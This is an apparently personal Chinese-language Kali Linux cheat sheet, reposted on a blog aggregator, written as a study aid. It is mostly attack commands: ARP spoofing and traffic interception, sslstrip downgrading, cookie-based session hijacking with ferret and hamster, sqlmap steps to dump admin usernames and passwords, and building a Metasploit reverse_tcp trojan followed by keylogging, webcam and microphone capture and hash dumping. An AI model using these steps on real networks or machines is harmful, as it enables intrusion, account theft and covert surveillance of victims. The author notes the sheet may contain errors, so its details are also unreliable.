zoukankan      html  css  js  c++  java
  • kali帮助

    kali help

    Attention

    这是我N久前学习kali时自己打的东西,不保证没有纰漏啊……

    网址

    kali:
    https://www.herojd.com/forum.php?mod=viewthread&tid=34

    网站破解:
    目录:
    https://www.herojd.com/forum.php?gid=50

    Burpsuite:
    https://www.herojd.com/forum.php?mod=viewthread&tid=25
    https://www.herojd.com/forum.php?mod=viewthread&tid=24

    部分常用指令

    ls

    显示目录(原dir)

    rm

    删除(就是remove嘛)

    进入目录(这个和cmd一样)

    cd

    返回上级目录(在Windows中是cd/或cd..)

    ifconfig

    查看内网IP

    cat

    查看内容

    vim 文件名
    文档编辑器,不存在就新建
    不保存,退出

    1. 按下ESC
    2. 按下shift+:
    3. 输入q!(不保存,退出的意思)

    编辑

    1. 按i键
    2. 按ESC
    3. 按shift+:
    4. 按wq(保存,退出)

    查找IP

    fping -a -g 目标IP列表
    -a显示是"活着"的目标
    -b n 大量 ping 数据要发送,以字节为单位 (默认 56)
    -f 文件读取列表中的目标是从一个文件 (-意味着 stdin) (仅当没有-g 指定)
    -g 生成目标列表 (仅当没有-f 指定)
    (指定的开始和结束 IP 在目标列表中,或提供一个 IP 子网掩码)
    (如: fping -a -g 192.168.1.0 192.168.1.255 或 fping -a -g 192.168.1.0/24)

    nmap -Ss 目标ip
    查看目标IP开放端口
    nmap -sP 192.168.0.*
    把你网段里的所有主机都找出来

    nmap -O 目标ip

    断网攻击+流量转发

    arpspoof -i 网卡 -t 目标IP 我的网关
    使目标IP进入我的网卡

    echo 1 >/proc/sys/net/ipv4/ip_forward
    进行IP流量转发(意为把1赋给一个文件)

    driftnet -i 网卡
    获取经过本机网卡的图片

    欺骗攻击(http/https)

    ettercap
    欺骗工具,DNS欺骗,流量嗅探等
    ettercap -Tq -i 网卡
    启动文本模式欺骗http
    ps:!ettercap会执行上一次的ettercap执行代码
    ps: ettercap会自动转发,无需再echo 1 >/proc/sys/net/ipv4/ip_forward,别转发两次

    sslstrip
    把https的链接还原成http(但是易出现证书错误,也有概率抓不到包)

    最后,若不是明文,就到百度上去URL解码

    会话劫持

    利用cookies,直接登录。
    wireshark
    抓包
    方法一
    1、输入wireshark,选择网卡开始
    2、等待目标IP登陆,等待网络延迟
    3、当出现大量DNS记录后,点红色小方框暂停
    4、file->save as(另存为)桌面->格式选择pcap(可能是第二个)现在可以关闭欺骗
    5、终端进入到桌面,输入ferret指令
    6、使用hamster指令
    7、改代理服务器:浏览器的Edit->Preferences->Advanced->选Manual proxy configuration->修改IP与端口
    8、访问第五行的IP:端口
    9、会出现被欺骗IP的链接,点击。若未出现,则是没抓到包
    10、在左边一栏查找可能是登录的网址(要有耐心哟(^U^)ノ~)
    PS:优先找全域名的哟(^U^)ノ~
    方法二
    1、无需欺骗,输入ferret -i 网卡可获取所有网段IP
    2、同时,删除hamster.txt,再同时使用hamster指令
    3、改代理服务器
    4、打开网页后,选adapters,输入网卡,点Submit Query
    5、在对方浏览网页是,网页会实时更新
    6、若无用,重新执行ferret和hamster指令,并等待ferret指令执行完毕
    7、在左边一栏查找可能是登录的网址(要有耐心哟(^U^)ノ~)
    PS:优先找全域名的哟(^U^)ノ~
    方法三(关闭代理!!!)
    1、直接打开cookies.jar(关闭代理!!!)
    2、选择网卡开始
    3、这时就已经在实时更新。当出现蓝色字体时,过一会点开
    4、在中间一栏查找可能是登录的网址(要有耐心哟(^U^)ノ~)
    5、觉得是可能的,就选中,点击Lead Demaln Cookies
    6、会弹出一个浏览器窗口,耐心的等它加载(做一个黑客就是要有耐心!)

    ferret
    重新生成抓包后的文件
    ferret -r 文件名.pcap
    会把原来抓包的pcap文件重新生成为txt文件
    ferret -i
    网卡可获取所有网段IP
    hamster
    重放流量
    直接输入,后把http端口改成3/4行括号里的端口,并且访问第五行的IP:端口

    sqlmap渗透注sql

    ASP网站

    sqlmap -u 网址
    检测是否存在注入并返回数据库的类型

    sqlmap -u 网址 --table
    猜解所有表名(耐性等待)

    sqlmap -u 网址 --columns -T"user"
    (columns)
    猜列名
    (user)
    根据经验确定这是用户表

    PHP网站

    sqlmap -u 网址(加协议和双引号)
    检测

    sqlmap -u 网址(加协议和双引号) --is-dba
    检测网站是否为dba权限

    sqlmap -u 网址(加协议和双引号) --dbs
    列出所有数据库

    sqlmap -u 网址(加协议和双引号) --dba
    列出所有数据库

    sqlmap -u 网址(加协议和双引号) --current-db
    查找自己的数据库

    sqlmap -u 网址(加协议和双引号) --table-D"数据库名"
    查询所有表名(根据数据库)

    sqlmap -u 网址(加协议和双引号) --columns -T "上一步中可能是管理员的表名"-D"数据库名"
    查询所有列

    sqlmap -u 网址(加协议和双引号) --dump -C "username,password" -T "上一步中可能是管理员的表名"-D"数据库名"
    查询所有列

    Cookies注入
    或许,在某些站的网址后加入and 1=2会有错误提示,那就是这个网站可用Cookies注入了
    先尝试常规注入
    sqlmap -u 网址(加协议和双引号)
    检测(一般没用,会出现黄色的错误)

    cookies检测
    sqlmap -u 网址(加协议和双引号且不要id = ***) --cookies "id参数" --level 2
    如果是cookies注入,就要把等级提升为level 2

    sqlmap -u 网址(加协议和双引号且不要id = ***) --tables --cookies "id参数" --level 2
    猜解(耐性等待哟(^U^)ノ~!)

    msfconsole

    输入即可启动(速度较慢)

    show
    显示所有漏洞

    use exploit/windows/smb/ms08

    msfpayload windows/meterpreter/reverse_tcp LHOST=本机ip LPORT=高端口 X > test.exe
    生成木马

    exploit/multi/handler
    使用handler模块

    set PAYLOAD windows/meterpreter/reverse_tcp
    使用shellcode

    set LHOST=本机ip
    set LPORT=高端口
    设置。。。

    等待目标打开

    sysinfo
    目标主机信息

    shell
    获取目标主机shell

    因为木马随时可能被结束进程
    所以要注入进程

    ps
    查看目标主机进程

    migrate 进程ID
    注入进程(常用explorer.exe)

    run vnc
    远程桌面

    文件管理
    Download
    下载文件
    Edit
    编辑文件
    cat
    查看文件
    cd
    切换目录
    mkdir
    创建文件
    mv
    移动文件
    rm
    删除文件
    upload
    上传文件
    rmdir
    删除文件夹

    网络及系统操作
    Arp
    查看arp缓冲表
    ifconfip
    IP
    Getproxy
    获得代理
    Netstat
    查看端口连接
    kill
    杀死进程
    ps
    查看进程
    reboot
    重启电脑
    reg
    修改注册表
    shell
    获得shell
    shutdown
    关机
    sysinfo
    主机信息

    用户操作及其他功能
    enumedesktops
    窗体
    keyscan_start
    键盘记录开始
    keyscan_dump
    键盘记录下载
    keyscan_stop
    键盘记录结束
    uictl 关闭desable或开启enable mouse或keyboard
    获得鼠标键盘控制权
    record_mic
    音频录制
    webcan_chat
    查看摄像头接口
    webcan_list
    查看摄像头列表
    webcan_stream
    摄像头获取
    getsystem
    获得高权限
    hashdump
    下载hash表

  • 相关阅读:
    xml解析模块
    python面向对象基础
    python hashlib模块
    os和sys模块
    python反射
    正则表达式re模块
    踩的python列表及for循环一个坑儿
    python序列化模块json和pickle
    python时间模块-time和datetime
    64匹马、8赛道,至少多少轮比赛找出速度最快的4匹马?
  • 原文地址:https://www.cnblogs.com/send-off-a-friend/p/12230167.html
Copyright © 2011-2022 走看看